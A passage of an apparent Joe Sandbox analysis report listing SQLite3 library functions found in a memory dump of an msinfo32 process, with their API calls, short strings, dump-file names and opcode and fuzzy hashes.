                                                                                                              • Instruction Fuzzy Hash: 52F03070544A458FCB40FF78C4C0918B7E4EF44354F51C46DDC8A8B31AE735E4518B11
                                                                                                              Function 61E4AD8E Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4ADA7
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4ADB8
                                                                                                              • sqlite3_blob_close.SQLITE3 ref: 61E4ADC3
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4ADCB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_blob_closesqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 1319845086-0
                                                                                                              • Opcode ID: 1616e11b48d3df0dc10a9ebfdc65c3b2ef8a9964f8c442407640014b50adb3a8
                                                                                                              • Instruction ID: dec895efa54c252f7cb45f19d34ee47ad18e8f95b78a78f695603d128c2bfd85
                                                                                                              • Opcode Fuzzy Hash: 1616e11b48d3df0dc10a9ebfdc65c3b2ef8a9964f8c442407640014b50adb3a8
                                                                                                              • Instruction Fuzzy Hash: E7E065B05447414FDB006FB4D4C4A15BBE4AF8432DF6254BDD88A8B35AE734D490C752
                                                                                                              Function 61E90CA3 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E90CAA
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E90CC2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E90CCF
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E90CEB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 3512769177-0
                                                                                                              • Opcode ID: 3c58fd3e75cd497f032d0b0ad9e6b189ebeadf39ab75494cbf9c0e5cfc1c877e
                                                                                                              • Instruction ID: dc49468b7e690a412fd6c3244f33019cbda001d4082e8e1b4f3a76e37e3c5446
                                                                                                              • Opcode Fuzzy Hash: 3c58fd3e75cd497f032d0b0ad9e6b189ebeadf39ab75494cbf9c0e5cfc1c877e
                                                                                                              • Instruction Fuzzy Hash: FDE01AB0948B8A8BDB007FB885C571DB6E8AB4634DF65846CC9888B215F7B5C4908792
                                                                                                              Function 61E2CBAF Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 441COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_strlike
                                                                                                              • String ID: \$m
                                                                                                              • API String ID: 933858916-1477243525
                                                                                                              • Opcode ID: e706ada53cd9f5f5c27932944ca345c7a78729bb14a7f1ea84bf4882fb7b341d
                                                                                                              • Instruction ID: 43169751724bbd961f5e865d0cd471fae9737a28945d5cabdee1654173312146
                                                                                                              • Opcode Fuzzy Hash: e706ada53cd9f5f5c27932944ca345c7a78729bb14a7f1ea84bf4882fb7b341d
                                                                                                              • Instruction Fuzzy Hash: 8A12C474A042598FDB40DFA8C880AADBBF2BF88314F248419E855EB354D739EC46CF51
                                                                                                              Function 61E18B00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log
                                                                                                              • String ID: `"a
                                                                                                              • API String ID: 632333372-704101349
                                                                                                              • Opcode ID: 6c5cceae02f90842606a9d961666776903d36c9ffeb6ba510de0946a65e1294e
                                                                                                              • Instruction ID: e60dee9a12a933685e8666c935eb7587c5c33cb943553d0d4c24d77e9762b505
                                                                                                              • Opcode Fuzzy Hash: 6c5cceae02f90842606a9d961666776903d36c9ffeb6ba510de0946a65e1294e
                                                                                                              • Instruction Fuzzy Hash: 9551F9B861AA09DFDB44CF5CC092E497BA0F74A360F28C91BED158B358D374D881EB12
                                                                                                              Function 61E06ACB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_strnicmp
                                                                                                              • String ID: '$null
                                                                                                              • API String ID: 1961171630-2611297978
                                                                                                              • Opcode ID: 6d6125b382316b2c503c9b4f3c5cafd53db4ccdd136e4724a21132cfef85c612
                                                                                                              • Instruction ID: af0257af9eb476f9cce6cb4f110c4b3705a3f718349cc5c40008daa320e02d28
                                                                                                              • Opcode Fuzzy Hash: 6d6125b382316b2c503c9b4f3c5cafd53db4ccdd136e4724a21132cfef85c612
                                                                                                              • Instruction Fuzzy Hash: A231DED0B4C9CA4EF70089A4C465392BBD36B8E31BF78C165C5864E28AE669D4E54B42
                                                                                                              Function 61E26078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E260B2
                                                                                                                • Part of subcall function 61E1865C: InterlockedCompareExchange.KERNEL32 ref: 61E1867C
                                                                                                                • Part of subcall function 61E1865C: InterlockedCompareExchange.KERNEL32 ref: 61E186C3
                                                                                                                • Part of subcall function 61E1865C: InterlockedCompareExchange.KERNEL32 ref: 61E186E3
                                                                                                                • Part of subcall function 61E185E6: sqlite3_win32_sleep.SQLITE3 ref: 61E1863E
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E2617D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                                              • String ID: winDelete
                                                                                                              • API String ID: 3336177498-3936022152
                                                                                                              • Opcode ID: 3600891162421721e6d1f8fa45676777f00912c89604ab1b4eaa90f45fc918de
                                                                                                              • Instruction ID: 3b00e225592ca5191c079bd99709a03937fd3ccec11a08c28fc5fc0e532a6c9d
                                                                                                              • Opcode Fuzzy Hash: 3600891162421721e6d1f8fa45676777f00912c89604ab1b4eaa90f45fc918de
                                                                                                              • Instruction Fuzzy Hash: BC31D470A086968BEB005FA5C8A0A9E7AF4EF49358F30C729EC5597385D738D4429B92
                                                                                                              Function 61E92130 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$ProtectQuery
                                                                                                              • String ID: @
                                                                                                              • API String ID: 1027372294-2766056989
                                                                                                              • Opcode ID: fda0bb641ca100852ae0b49bb33be338f5b982c28ae7e5d3439ab30b7da5f0ca
                                                                                                              • Instruction ID: 8d4021f236e4b410ecd5b95d33833d118e3d6733507a1e438a1afa340e3ec65a
                                                                                                              • Opcode Fuzzy Hash: fda0bb641ca100852ae0b49bb33be338f5b982c28ae7e5d3439ab30b7da5f0ca
                                                                                                              • Instruction Fuzzy Hash: 3A314AB29157028FDB10DF78C58461EBBE0FB95754F59CA5CE85897340E734E884CB92
                                                                                                              Function 61E623CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 3
                                                                                                              • API String ID: 0-1842515611
                                                                                                              • Opcode ID: 64553797d164d143313a669df00b72d9bd358ff2a115a4b9fc01bd42805f8df1
                                                                                                              • Instruction ID: 13c68e7d0d27a0622058205f3a7885ad47da0fab38c0d2582d0ad46b8b72665b
                                                                                                              • Opcode Fuzzy Hash: 64553797d164d143313a669df00b72d9bd358ff2a115a4b9fc01bd42805f8df1
                                                                                                              • Instruction Fuzzy Hash: 51317C749043568BDB60CF69C8C0B89BBF4FB16318F6485A9E89C9B345E730D984CF91
                                                                                                              Function 61E13FFA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E14017
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1408C
                                                                                                                • Part of subcall function 61E13D7F: sqlite3_mutex_try.SQLITE3(?,?,?,61E13DFF), ref: 61E13D1F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_mutex_try
                                                                                                              • String ID: #
                                                                                                              • API String ID: 2389339727-1885708031
                                                                                                              • Opcode ID: 926ae2b52d0ac5a68cb213fe7d25c94c29df1b7f21d13467dc8a7c437752a2b7
                                                                                                              • Instruction ID: be59f4d3fb6e307c305fa137762aeb693b5bdc9c36588164b1a69f8aefe745cd
                                                                                                              • Opcode Fuzzy Hash: 926ae2b52d0ac5a68cb213fe7d25c94c29df1b7f21d13467dc8a7c437752a2b7
                                                                                                              • Instruction Fuzzy Hash: F711607060824ACFD700DFAAD48185AB7B5FF8935DF24C52AE8148B314D771ED91CB92
                                                                                                              Function 61E03955 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_stricmp.SQLITE3(00000000,?,?,61E6334F), ref: 61E039CF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmp
                                                                                                              • String ID: sqlite_master$sqlite_temp_master
                                                                                                              • API String ID: 912767213-3047539776
                                                                                                              • Opcode ID: 9f6041365354eaa8d1f7bb0f8c7df68677f03e90ed5e8671f88c1b64388aef1f
                                                                                                              • Instruction ID: 7d765049e0c6d8cbbc48031e66ecd9d46b81c3b09a05d1cda12c4b9520b58985
                                                                                                              • Opcode Fuzzy Hash: 9f6041365354eaa8d1f7bb0f8c7df68677f03e90ed5e8671f88c1b64388aef1f
                                                                                                              • Instruction Fuzzy Hash: 8C11A9B17042164FAB00DFADC88196BB7F4FFC8709B698869DC64D7305D370D82187A1
                                                                                                              Function 61E1D5E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D5FF
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E1D60B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                              • String ID:
                                                                                                              • API String ID: 3265351223-3916222277
                                                                                                              • Opcode ID: 1a3f78a35ac6a48ca870a7142d9f21fc3f05ea2b319a461e2f8582b8a1bedd9f
                                                                                                              • Instruction ID: af1eb661bef2e3a8912268a60f0180e5285a43f998984b12f397a241703889bb
                                                                                                              • Opcode Fuzzy Hash: 1a3f78a35ac6a48ca870a7142d9f21fc3f05ea2b319a461e2f8582b8a1bedd9f
                                                                                                              • Instruction Fuzzy Hash: 1F115E746086458BDF059FA8D0CA65A7FF0FF59318F248899D8A8CB24AD771C9A0C792
                                                                                                              Function 61E1D574 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D58D
                                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E1D599
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                              • String ID:
                                                                                                              • API String ID: 3265351223-3916222277
                                                                                                              • Opcode ID: 9ed41e6173973cf26dca8f28c8b1bd458f8d4f3a0adab18fb41b577895b33514
                                                                                                              • Instruction ID: 69941ccdd6316b2154d21ec7c6755cbb4a368580baeeb89bccffd3cf1f7b42bd
                                                                                                              • Opcode Fuzzy Hash: 9ed41e6173973cf26dca8f28c8b1bd458f8d4f3a0adab18fb41b577895b33514
                                                                                                              • Instruction Fuzzy Hash: 33018C75908B49CBDF109FB8C4C965ABBF4FF45328F208559D8A48B288DB31C8508B92
                                                                                                              Function 61E1001E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1008D), ref: 61E10036
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter
                                                                                                              • String ID: "a$"a
                                                                                                              • API String ID: 3053899952-4156780559
